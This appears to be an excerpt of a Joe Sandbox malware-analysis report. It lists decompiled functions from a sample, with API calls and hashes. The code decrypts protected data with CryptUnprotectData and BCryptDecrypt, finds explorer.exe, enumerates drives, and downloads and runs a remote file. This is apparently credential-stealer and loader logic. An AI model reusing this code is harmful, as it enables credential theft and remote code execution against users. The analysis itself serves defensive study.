				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				int _v88;
				void* _t36;
				long _t50;
				void* _t54;
				int _t61;
				void* _t63;
				void* _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t63 = __ecx;
				_t73 = __edx;
				_v12 = 0x3176;
				_v10 = 0x30;
				_t75 = __ecx;
				if(__edx < 3) {
					L8:
					_push(_t63);
					_push( &_v16);
					_push( &_v20);
					_t36 = E0103C1DD(_t75, _t73, __eflags);
					__eflags = _t36;
					if(_t36 != 0) {
						_t76 = E01031085(_v16 + 1);
						__eflags = _v16 + 1;
						E01031052(_t76, 0, _v16 + 1);
						E0103102C(_t76, _v20, _v16);
						LocalFree(_v20);
						goto L10;
					}
				} else {
					_t36 = E01031000(__ecx,  &_v12, 3);
					_t77 = _t77 + 0xc;
					if(_t36 != 0) {
						goto L8;
					} else {
						if(_a4 != _t36 && _a8 != _t36) {
							_t61 = 0x40;
							E01031052( &_v88, _t36, _t61);
							_t7 = _t75 + 3; // 0x3
							_v88 = _t61;
							_v80 = _t7;
							_t10 = _t73 - 0x10; // -16
							_v84 = 1;
							_v76 = 0xc;
							_v64 = _t10 + _t75;
							_t14 = _t73 - 0x1f; // -31
							_t50 = _t14;
							_v60 = 0x10;
							_v16 = _t50;
							_t36 = LocalAlloc(_t61, _t50);
							_t74 = _t36;
							if(_t74 != 0) {
								_t54 = _v80 + _v76;
								__imp__BCryptDecrypt(_a8, _t54, _v16,  &_v88, 0, 0, _t74, _v16,  &_v16, 0);
								if(_t54 != 0) {
									return 0x1048fe6;
								}
								_t76 = E01031085(_v16 + 1);
								E01031052(_t76, 0, _v16 + 1);
								E0103102C(_t76, _t74, _v16);
								LocalFree(_t74);
								L10:
								return _t76;
							}
						}
					}
				}
				return _t36;
			}

0x0103c6bd
0x0103c6c6
0x0103c6c8
0x0103c6ce
0x0103c6d2
0x0103c6d7
0x0103c7b0
0x0103c7b0
0x0103c7b6
0x0103c7bc
0x0103c7c0
0x0103c7c8
0x0103c7ca
0x0103c7da
0x0103c7dc
0x0103c7e1
0x0103c7f0
0x0103c7fb
0x00000000
0x0103c7fb
0x0103c6dd
0x0103c6e4
0x0103c6e9
0x0103c6ee
0x00000000
0x0103c6f4
0x0103c6f7
0x0103c708
0x0103c70f
0x0103c714
0x0103c717
0x0103c71a
0x0103c720
0x0103c723
0x0103c72c
0x0103c733
0x0103c736
0x0103c736
0x0103c73b
0x0103c742
0x0103c745
0x0103c74b
0x0103c74f
0x0103c76c
0x0103c773
0x0103c77b
0x00000000
0x0103c7a9
0x0103c78b
0x0103c791
0x0103c79e
0x0103c7fb
0x0103c7fb
0x00000000
0x0103c801
0x0103c74f
0x0103c6f7
0x0103c6ee
0x0103c807

APIs

LocalAlloc.KERNEL32(00000040,-0000001F,?,?,?,00000000,?,00000000), ref: 0103C745
BCryptDecrypt.BCRYPT(?,0000000C,?,?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,?,00000000), ref: 0103C773

Part of subcall function 01031085: GetProcessHeap.KERNEL32(00000000,?,010434B7,00400000,?,?,00000000,?,?,01045553), ref: 0103108B
Part of subcall function 01031085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,01045553), ref: 01031092

LocalFree.KERNEL32(?), ref: 0103C7FB

Strings

0, xrefs: 0103C6CE
v1, xrefs: 0103C6C8

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: HeapLocal$AllocAllocateCryptDecryptFreeProcess
String ID: 0$v1
API String ID: 4131498132-3331332043
Opcode ID: 23093abce94266ab52fea966b969ef160424290eb6a363fc37f7676710671762
Instruction ID: 7c593572c53f3bd46ef9132d0a00624afa73baac5db1d1ff156b4fd0baee3055
Opcode Fuzzy Hash: 23093abce94266ab52fea966b969ef160424290eb6a363fc37f7676710671762
Instruction Fuzzy Hash: 7941A2B6D00119BBEB119BE4DD84EEFBBBCEF88350F044066F951E2240E7759A098B60

Uniqueness

Uniqueness Score: -1.00%

Function 01040A8C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01040A8C(void* __ecx, void* __eflags) {
				void* _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				long _v20;
				long _v24;
				union _SID_NAME_USE _v28;
				short _v60;
				short _v580;
				void* _t37;

				_v20 = 0x10;
				_v8 = 0;
				_t37 = __ecx;
				_v16.Value = 0;
				_v12 = 0x500;
				E01031052( &_v580, 0, 0x208);
				_v24 = 0x104;
				if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v8) == 0 || LookupAccountSidW(0, _v8,  &_v580,  &_v24,  &_v60,  &_v20,  &_v28) == 0) {
					GetLastError();
				}
				if(_v8 != 0) {
					FreeSid(_v8);
				}
				E010336F7(_t37,  &_v580);
				return _t37;
			}

0x01040a99
0x01040aab
0x01040ab0
0x01040ab2
0x01040ab5
0x01040abb
0x01040ac3
0x01040ae9
0x01040b10
0x01040b10
0x01040b19
0x01040b1e
0x01040b1e
0x01040b2d
0x01040b37

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,0103D311,?,?,00000001), ref: 01040AE1
LookupAccountSidW.ADVAPI32(00000000,0103D311,?,00000104,?,00000010,?), ref: 01040B06
GetLastError.KERNEL32(?,?,00000001), ref: 01040B10
FreeSid.ADVAPI32(0103D311,?,?,00000001), ref: 01040B1E

Strings

@Mqt, xrefs: 01040B10

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: AccountAllocateErrorFreeInitializeLastLookup
String ID: @Mqt
API String ID: 1866703397-2740872224
Opcode ID: 9e40d88aa6537ec6d7df0b9ac77ff2a93d420a0bf90d275d15b57380728d82de
Instruction ID: 3ded78dfe4b89039636ef50299030f4027abb1e18215a4b1c671a19dce9929dd
Opcode Fuzzy Hash: 9e40d88aa6537ec6d7df0b9ac77ff2a93d420a0bf90d275d15b57380728d82de
Instruction Fuzzy Hash: 2811DAB5A0021DABDB20DFD4DDC9EEEB7BCFB08344F4004A6F645E2180E7759A449BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0104405F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0104405F(void* __ecx, void* __eflags) {
				char _v264;
				intOrPtr _v292;
				void* _v300;
				int _t11;
				void* _t22;

				_t22 = CreateToolhelp32Snapshot(2, 0);
				E01031052( &_v300, 0, 0x128);
				_v300 = 0x128;
				_t11 = Process32First(_t22,  &_v300);
				while(_t11 != 0) {
					if(E01031176( &_v264, "explorer.exe") == 0) {
						return _v292;
					}
					_t11 = Process32Next(_t22,  &_v300);
				}
				CloseHandle(_t22);
				return 0;
			}

0x01044079
0x01044085
0x0104408d
0x0104409b
0x010440c8
0x010440b8
0x00000000
0x010440d9
0x010440c2
0x010440c2
0x010440cd
0x00000000

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0104406E
Process32First.KERNEL32(00000000,?), ref: 0104409B
Process32Next.KERNEL32 ref: 010440C2
CloseHandle.KERNEL32(00000000), ref: 010440CD

Strings

explorer.exe, xrefs: 010440A9

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID: explorer.exe
API String ID: 420147892-3187896405
Opcode ID: 5aca886155868070548b03efb29cb23739d14b59c62bb813f776bfc19bdaed7d
Instruction ID: 6f61058616069219f520f8338f480af8416fa61fd0ae6355501dda5a177a4ed9
Opcode Fuzzy Hash: 5aca886155868070548b03efb29cb23739d14b59c62bb813f776bfc19bdaed7d
Instruction Fuzzy Hash: 790181F6A01124ABE7709764ED89FDE77FCDB49310F0000B1F985E2184EB74DAA88B65

Uniqueness

Uniqueness Score: -1.00%

Function 01039D97 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
memoryencryptionstringCOMMON

Download Yara Rule

C-Code - Quality: 24%

			E01039D97(intOrPtr __ecx, WCHAR* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v8216;
				char* _t24;
				signed int _t27;
				WCHAR* _t29;
				intOrPtr _t30;
				signed int* _t31;
				intOrPtr _t32;
				void* _t34;
				intOrPtr _t35;
				intOrPtr _t36;
				void* _t38;
				void* _t39;

				_t30 = __ecx;
				E010311C0(0x2014, __ecx);
				_t36 = _a4;
				_t29 = __edx;
				_v8 = _t30;
				_t3 = _t36 - 1; // -1
				_t34 = GlobalAlloc(0x40, _t3);
				_t38 = 1;
				if(_t36 > 1) {
					_t32 = _v8;
					do {
						 *((char*)(_t34 + _t38 - 1)) =  *((intOrPtr*)(_t38 + _t32));
						_t38 = _t38 + 1;
					} while (_t38 < _t36);
				}
				_t8 = _t36 - 1; // -1
				_v12 = _t34;
				_v16 = _t8;
				_t39 = 0;
				_t24 =  &_v16;
				__imp__CryptUnprotectData(_t24, 0, 0, 0, 0, 0,  &_v24);
				if(_t24 == 0) {
					_push(L"Could not decrypt");
				} else {
					if(_t36 > 0) {
						_t35 = _v20;
						_t31 =  &_v8216;
						do {
							_t27 =  *(_t35 + _t39) & 0x000000ff;
							_t39 = _t39 + 2;
							 *_t31 = _t27;
							_t31 =  &(_t31[0]);
						} while (_t39 < _t36);
					}
					_push( &_v8216);
				}
				return lstrcpyW(_t29, ??);
			}

0x01039d97
0x01039d9f
0x01039da7
0x01039daa
0x01039dac
0x01039daf
0x01039dbd
0x01039dbf
0x01039dc2
0x01039dc4
0x01039dc7
0x01039dca
0x01039dce
0x01039dcf
0x01039dc7
0x01039dd3
0x01039dd6
0x01039dd9
0x01039ddc
0x01039de7
0x01039deb
0x01039df3
0x01039e1c
0x01039df5
0x01039df7
0x01039df9
0x01039dfc
0x01039e02
0x01039e02
0x01039e06
0x01039e09
0x01039e0c
0x01039e0f
0x01039e02
0x01039e19
0x01039e19
0x01039e2c

APIs

GlobalAlloc.KERNEL32(00000040,-00000001,76B2E730,?,?,?,01039D4B,00001000,?,00000000,00001000), ref: 01039DB5
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,01039D4B), ref: 01039DEB
lstrcpyW.KERNEL32 ref: 01039E22

Strings

Could not decrypt, xrefs: 01039E1C

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: AllocCryptDataGlobalUnprotectlstrcpy
String ID: Could not decrypt
API String ID: 3112367126-1484008118
Opcode ID: 01464e5f46da174b77756c0e24c7bae831dd12c380ee894f6060a1d6d15116b2
Instruction ID: 516803c881e23055129a628c9a7bb5028bb158274820b62e3b123f99d4a7859d
Opcode Fuzzy Hash: 01464e5f46da174b77756c0e24c7bae831dd12c380ee894f6060a1d6d15116b2
Instruction Fuzzy Hash: 0711E9769002199BC721DB9DC9849DEFBFCEF88704B1044A6E985E7201E7719A01CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 010409ED Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E010409ED() {
				intOrPtr _v6;
				char _v288;
				struct HINSTANCE__* _t4;
				intOrPtr _t5;
				_Unknown_base(*)()* _t9;

				_v288 = 0x11c;
				_t4 = LoadLibraryA("ntdll.dll");
				if(_t4 == 0) {
					L3:
					_t5 = _v6;
					if(_t5 == 2 || _t5 == 3) {
						return 1;
					} else {
						goto L5;
					}
				} else {
					_t9 = GetProcAddress(_t4, "RtlGetVersion");
					if(_t9 == 0) {
						L5:
						return 0;
					} else {
						 *_t9( &_v288);
						goto L3;
					}
				}
			}

0x010409fb
0x01040a05
0x01040a0d
0x01040a28
0x01040a28
0x01040a2d
0x01040a3b
0x00000000
0x00000000
0x00000000
0x01040a0f
0x01040a15
0x01040a1d
0x01040a33
0x01040a36
0x01040a1f
0x01040a26
0x00000000
0x01040a26
0x01040a1d

APIs

LoadLibraryA.KERNEL32(ntdll.dll), ref: 01040A05
GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 01040A15

Strings

RtlGetVersion, xrefs: 01040A0F
ntdll.dll, xrefs: 010409F6

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: RtlGetVersion$ntdll.dll
API String ID: 2574300362-1489217083
Opcode ID: 41c874a8eee7b8525384f908a89b4e5b76f143d6f58e9501963d62dfe0d0a534
Instruction ID: 0f8dc6f8356f0fb67d63b6ac7f59fd1cb7bc08c666e6c82c384229d761ff0e5b
Opcode Fuzzy Hash: 41c874a8eee7b8525384f908a89b4e5b76f143d6f58e9501963d62dfe0d0a534
Instruction Fuzzy Hash: 90E0D8B578024C57DB785B795D8BADB3BE85B06209F4402F8BBC2F0049DB74C546CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0103C3B9 Relevance: 6.0, APIs: 4, Instructions: 49
encryptionmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0103C3B9(intOrPtr __ecx, void** __edx, long* _a4) {
				intOrPtr _v8;
				void* _t6;
				void* _t8;
				long* _t9;
				void* _t13;
				void** _t14;
				void* _t16;
				void* _t17;

				_t9 = _a4;
				_t17 = 0;
				_v8 = __ecx;
				_t14 = __edx;
				 *_t9 = 0;
				 *((intOrPtr*)(__edx)) = 0;
				__imp__CryptStringToBinaryW(__ecx, 0, 1, 0, _t9, 0, 0, _t13, _t16, _t8, __ecx);
				if(__ecx != 0) {
					_t6 = LocalAlloc(0x40,  *_t9);
					 *_t14 = _t6;
					if(_t6 != 0) {
						__imp__CryptStringToBinaryW(_v8, 0, 1, _t6, _t9, 0, 0);
						_t17 = _t6;
						if(_t17 == 0) {
							 *_t14 = LocalFree( *_t14);
						}
					}
				}
				return _t17;
			}

0x0103c3be
0x0103c3c5
0x0103c3c7
0x0103c3d0
0x0103c3d2
0x0103c3d6
0x0103c3d8
0x0103c3e0
0x0103c3e6
0x0103c3ec
0x0103c3f0
0x0103c3fc
0x0103c402
0x0103c406
0x0103c410
0x0103c410
0x0103c406
0x0103c3f0
0x0103c418

APIs

CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0103C3D8
LocalAlloc.KERNEL32(00000040,?,?,0103C32B,?,00000000,?,00000000,?), ref: 0103C3E6
CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0103C3FC
LocalFree.KERNEL32(?,?,0103C32B,?,00000000,?,00000000,?), ref: 0103C40A

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID:
API String ID: 4291131564-0
Opcode ID: e2fe068081ae85b6857ccc99e9eafe698226a4e032ac5e1e02fbca5ecd462c4d
Instruction ID: d47f4a39ebda0f461727b9e3b54ea642d234ab0bf0264293250ede9903890cae
Opcode Fuzzy Hash: e2fe068081ae85b6857ccc99e9eafe698226a4e032ac5e1e02fbca5ecd462c4d
Instruction Fuzzy Hash: B2016DB4202221BFE7310B5A8D89EA7BFACEF057E0B104061F988E6240DB719C40DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0103290E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82
filenetworkCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0103290E(void* __ecx, void* __eflags, signed int _a4) {
				short* _v12;
				void* _v16;
				char _v20;
				void* _t26;
				void* _t36;
				void* _t38;
				void* _t42;
				void* _t58;
				void* _t59;

				_t66 = __eflags;
				_t42 = __ecx;
				_t58 = 0x1a;
				E01040C8A( &_v12, _t58, __eflags);
				_t59 = 0xa;
				_t26 = E010335B9( &_v16, _t59, __eflags);
				E01033447(E0103357C( &_v12, _t59, _t66, "\\"), _t66, _t26);
				E01035FEB(_v16);
				_t61 = _a4 + 4;
				E0103373F( &_v16, _a4 + 4);
				E01033447( &_v12, _t66, E0103362F( &_v16,  &_a4));
				E01035FEB(_a4);
				_a4 = _a4 & 0x00000000;
				E01035FEB(_v16);
				_t36 = E0103373F( &_a4, _t61);
				__imp__URLDownloadToFileW(0, _a4, _v12, 0, 0);
				E01035FEB(_a4);
				if(_t36 == 0) {
					_t38 = ShellExecuteW(0, L"open", _v12, 0, 0, 5);
					_v16 = 2;
					__eflags = _t38 - 0x20;
					if(_t38 > 0x20) {
						_v16 = 0;
					}
				} else {
					_v16 = 1;
				}
				_v20 = 0x1047810;
				E01035044(_t42,  &_v20);
				return E01035FEB(_v12);
			}

0x0103290e
0x01032917
0x0103291e
0x0103291f
0x01032926
0x0103292a
0x01032941
0x01032949
0x01032954
0x01032958
0x0103296d
0x01032975
0x0103297d
0x01032981
0x0103298d
0x0103299b
0x010329a6
0x010329ad
0x010329c5
0x010329cb
0x010329d2
0x010329d5
0x010329d7
0x010329d7
0x010329af
0x010329af
0x010329af
0x010329dd
0x010329e7
0x010329f8

APIs

Part of subcall function 01040C8A: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000,?,?,?), ref: 01040CBB

Part of subcall function 01033447: lstrcatW.KERNEL32(00000000,76B30770), ref: 01033477

Part of subcall function 01035FEB: VirtualFree.KERNELBASE(?,00000000,00008000,01035D70,00000000,?,01042694,?,?,0104577A), ref: 01035FF3

Part of subcall function 0103373F: lstrcpyW.KERNEL32 ref: 01033769

Part of subcall function 0103362F: PathFindExtensionW.SHLWAPI(?,?,01032969,?,?,00000000,010476A4), ref: 01033639

URLDownloadToFileW.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 0103299B
ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 010329C5

Strings

open, xrefs: 010329BF

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: Path$DownloadExecuteExtensionFileFindFolderFreeShellSpecialVirtuallstrcatlstrcpy
String ID: open
API String ID: 4166385161-2758837156
Opcode ID: 66767dd2d46f2ddb452c14ff194c479f2fa04104393727356ed861aad327065c
Instruction ID: 4591d97a722587b70be986adbd3134417d0006fa2a32d86c37544d149d36ad8e
Opcode Fuzzy Hash: 66767dd2d46f2ddb452c14ff194c479f2fa04104393727356ed861aad327065c
Instruction Fuzzy Hash: FF21B275900209BBCB15ABA5CCC4EEE7B7CFFD5750F004069F5866B290DB345A45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0104154A Relevance: 4.6, APIs: 3, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0104154A(intOrPtr __ecx, void* __eflags) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				int _v20;
				WCHAR* _v24;
				intOrPtr _v28;
				signed int _v32;
				intOrPtr _v36;
				char _v40;
				WCHAR* _t33;
				intOrPtr _t34;
				int _t44;
				WCHAR* _t54;
				signed int _t72;
				intOrPtr _t74;
				int _t75;
				long _t76;
				WCHAR* _t77;
				void* _t78;
				void* _t79;

				_t74 = __ecx;
				_v12 = __ecx;
				_t33 = E01036099(0x208);
				_v32 = _v32 & 0x00000000;
				_t54 = _t33;
				_t34 = 5;
				_v28 = _t34;
				_v36 = _t34;
				E01031A48( &_v40, __eflags);
				_t76 = GetLogicalDriveStringsW(0x104, _t54);
				_t81 = _t76 - 0x104;
				if(_t76 > 0x104) {
					_t72 = 2;
					_t54 = E01036099( ~(0 | _t81 > 0x00000000) | _t36 * _t72);
					GetLogicalDriveStringsW(_t76, _t54);
				}
				_t77 = 0;
				if( *_t54 != 0) {
					do {
						_v24 = _t77;
						E01033549( &_v24, E010336F7( &_v8, _t54));
						E01035FEB(_v8);
						_v8 = _t77;
						_t44 = GetDriveTypeW(_v24);
						_t79 = _t79 - 0xc;
						_t75 = _t44;
						_t78 = _t79;
						_v20 = _t75;
						E0103373F(_t78,  &_v24);
						 *(_t78 + 4) = _t75;
						 *((intOrPtr*)(_t78 + 8)) = _v16;
						E01031955( &_v40);
						_t54 =  &(( &(_t54[E01033373( &_v24)]))[1]);
						E01035FEB(_v24);
						_t77 = 0;
						_v24 = 0;
						_t84 =  *_t54;
					} while ( *_t54 != 0);
					_t74 = _v12;
				}
				E010313FA(_t74, _t84,  &_v40);
				_t60 = _v40;
				if(_v40 != 0) {
					E01031B52(_t60, _t60);
				}
				return _t74;
			}

0x01041553
0x0104155a
0x0104155d
0x01041562
0x0104156b
0x0104156d
0x0104156e
0x01041571
0x01041574
0x01041585
0x01041587
0x0104158d
0x01041593
0x010415a2
0x010415a6
0x010415a6
0x010415ac
0x010415b1
0x010415b3
0x010415b7
0x010415c3
0x010415cb
0x010415d3
0x010415d6
0x010415dc
0x010415df
0x010415e1
0x010415e3
0x010415ec
0x010415f7
0x010415fa
0x010415fd
0x01041610
0x01041613
0x01041618
0x0104161a
0x0104161d
0x0104161d
0x01041622
0x01041622
0x0104162b
0x01041630
0x01041635
0x01041638
0x01041638
0x01041643

APIs

Part of subcall function 01036099: GetProcessHeap.KERNEL32(00000000,000000F4,01041996,?,76B30770,00000000,01035B72), ref: 0103609C
Part of subcall function 01036099: HeapAlloc.KERNEL32(00000000), ref: 010360A3

GetLogicalDriveStringsW.KERNEL32(00000104,00000000), ref: 0104157F
GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 010415A6
GetDriveTypeW.KERNEL32(?,00000000,00000000), ref: 010415D6

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: Drive$HeapLogicalStrings$AllocProcessType
String ID:
API String ID: 2408535517-0
Opcode ID: afe9003bd248784354218259a0a857f43d98159044f56a4c8188bbcfefd29884
Instruction ID: 29a324b0304f63896304de54f9900266b0bc6464159d69cd4c108c1e821e9d18
Opcode Fuzzy Hash: afe9003bd248784354218259a0a857f43d98159044f56a4c8188bbcfefd29884
Instruction Fuzzy Hash: DE3181B1E0021A9BCF14EBA8C5C59EFB7F9EF98240F100069D582B7290DB745E418BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0103A8C3 Relevance: 4.6, APIs: 3, Instructions: 61
stringencryptionCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0103A8C3(void* __ecx, void* __eflags, CHAR* _a4, CHAR** _a8) {
				int _v8;
				DWORD* _v12;
				DWORD* _v16;
				void* _v20;
				int _v24;
				BYTE* _v28;
				char _v32;
				char _v8128;
				int _t27;
				CHAR* _t39;
				void* _t43;

				_t43 = __ecx;
				E010311C0(0x1fbc, __ecx);
				_v8 = 0x1fa0;
				_t27 = lstrlenA(_a4);
				E01031052( &_v8128, 0, 0x1fa0);
				CryptStringToBinaryA(_a4, _t27, 1,  &_v8128,  &_v8, 0, 0);
				_v32 = 0;
				_v28 =  &_v8128;
				_v24 = _v8;
				_v16 = 0;
				_v12 = 0;
				_v20 = 0;
				 *((intOrPtr*)(_t43 + 0x70))( &_v32,  &_v20, 0);
				 *((char*)(_v12 + _v16)) = 0;
				_t39 = E01035FFA(_v12 + 1);
				 *_a8 = _t39;
				return lstrcpyA(_t39, _v16);
			}

0x0103a8c3
0x0103a8cb
0x0103a8dd
0x0103a8e0
0x0103a8f3
0x0103a90e
0x0103a91a
0x0103a91d
0x0103a923
0x0103a92e
0x0103a932
0x0103a935
0x0103a938
0x0103a944
0x0103a94d
0x0103a959
0x0103a965

APIs

